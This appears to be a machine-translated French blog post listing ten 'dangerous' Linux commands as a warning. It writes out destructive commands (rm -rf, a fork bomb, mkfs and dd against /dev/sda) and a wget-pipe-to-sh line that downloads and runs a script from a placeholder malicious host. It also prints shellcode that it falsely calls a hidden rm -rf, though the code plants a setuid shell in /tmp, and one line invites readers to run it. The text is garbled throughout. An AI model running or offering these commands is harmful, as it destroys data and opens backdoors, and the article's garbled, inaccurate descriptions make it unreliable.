10 commandes Linux les plus dangereuses que vous ne devriez jamais exécuter

Eh bien, si vous avez déjà utilisé un système d’exploitation Linux, vous savez peut-être que la plate-forme est plus indépendante que Windows. Linux est un système d’exploitation open source et offre aux utilisateurs suffisamment de liberté pour effectuer les différentes opérations. Cependant, pour les nouveaux utilisateurs, l’exploitation de Linux pourrait être une tâche difficile.

Tout comme sous Windows, Linux dispose également de nombreuses commandes de terminal pour effectuer différentes opérations. Cependant, contrairement à Windows, Linux ne vous demandera pas de confirmation si vous exécutez une commande qui pourrait endommager votre système. Nous vous recommandons donc de ne pas utiliser ces commandes à tout prix.

10 commandes Linux les plus dangereuses que vous ne devriez jamais exécuter

Donc, dans cet article, nous allons partager certaines des commandes Linux dangereuses que vous ne devriez jamais exécuter sur Linux. Voyons donc les commandes mortelles que vous ne devriez jamais exécuter sur un ordinateur Linux.

1. rm -rf

La commande rm -rf est l’un des moyens les plus rapides de supprimer un dossier et son contenu. Mais une petite erreur de frappe ou une ignorance peut entraîner des dommages irréparables pour le système. Certaines des options utilisées avec la commande rm sont comme la commande Rm -r supprime le dossier récursivement, même le dossier vide. La commande rm -f supprime «uniquement lire le fichier» sans demander. Il a également le pouvoir d’éliminer tous les fichiers présents dans le répertoire racine.

2.: () {: |: &} ;:

La commande ci-dessus est la bombe à fourche. Il fonctionne en définissant une fonction appelée ”, qui est appelée deux fois, une au premier plan et une fois en arrière-plan. Il continue de fonctionner encore et encore jusqu’à ce que le système se bloque.

3. command> / dev / sda

La commande ci-dessus écrit la sortie de la commande ‘sur le bloc / dev / sda. La commande ci-dessus écrit des données brutes et tous les fichiers du bloc seront remplacés par des données brutes, entraînant une perte totale de données dans le bloc.

4. mv directory / dev / null

Cette commande déplace fondamentalement tous les fichiers vers / dev / null, oui, cela signifie qu’elle disparaît simplement de tous les fichiers du système.

5. wget http: // malicious_source -O | sh

La commande ci-dessus téléchargera un script à partir d’une source malveillante, puis l’exécutera sur votre système. La commande Wget téléchargera le script et la commande sh exécutera le script téléchargé sur votre système.

6. Mkfs.ext3 / dev / sda

La commande ci-dessus formatera simplement le bloc «sda» et vous saurez certainement qu’après avoir exécuté la commande ci-dessus, votre bloc (disque dur) sera réinitialisé sur NOUVEAU! Sans les données, laissant le système en phase irrécupérable.

7. > File

La commande ci-dessus est utilisée pour libérer le contenu du fichier. Si la commande ci-dessus est exécutée avec une erreur de frappe ou une ignorance, «> xt.conf» écrira le fichier de configuration ou tout autre système ou fichier de configuration.

8. ^ foo ^ bar

Cette commande permet de modifier la commande précédente sans avoir à retaper l’intégralité de la commande. Mais cela peut être vraiment problématique si vous ne prenez pas le risque de vérifier soigneusement la modification de la commande d’origine à l’aide de la commande ^ ^ foo bar.

9. dd if = / dev / random of = / dev / sda

La commande ci-dessus se terminera par / dev / sda et écrira des données aléatoires pour le bloc. Bien sûr! Votre système serait laissé dans une phase incohérente et irrécupérable.

dix. invisible Command

La commande suivante n’est rien de plus que la première commande de cet article (rm-rf). Ici, les codes sont cachés en hexadécimal pour qu’un utilisateur ignorant puisse être dupe. Exécutez le code ci-dessous dans votre terminal et effacez votre partition racine.

Cette commande montre ici que la menace peut être cachée et généralement indétectable parfois. Vous devez être conscient de ce que vous faites et quel serait le résultat. Ne pas compiler / exécuter de code à partir d’une source inconnue.

char esp[] __attribute__ ((section (“. text”))) / * esp release * / = ” x x3e x5b x31 xc0 x50 x54 x5a x83 xec x64 x68 ″” xff xff. xff xff x68 xdf xd0 xdf xd9 x68 x8d x99 ″ “ xdf x81 x68 x8d x92 xdf xd2 x54 x5e xf7 x16 xf7 ″“ x56 x04 xf7 x56 x08 xf7 x56 x0c x83 xc4 x74 x56 ″ ” x8d x73 x08 x56 x53 x54 x59 xb0 x0b xcd x80 x31 ″” xc0 x40 xeb xf9 xe8 xbd xff xff xff x2f x62 x69 ″ ” x6e x2f x73 x68 x00 x2d x63 x00 ″” cp -p / bin / sh /tmp/.beyond; chmod 4755 /tmp/.beyond; ”;

Donc, ce sont quelques-unes des commandes Linux dangereuses que vous devez éviter. Vous ne devez pas exécuter cette commande à tout prix. J’espère que cet article vous a aidé! Partagez-le également avec vos amis.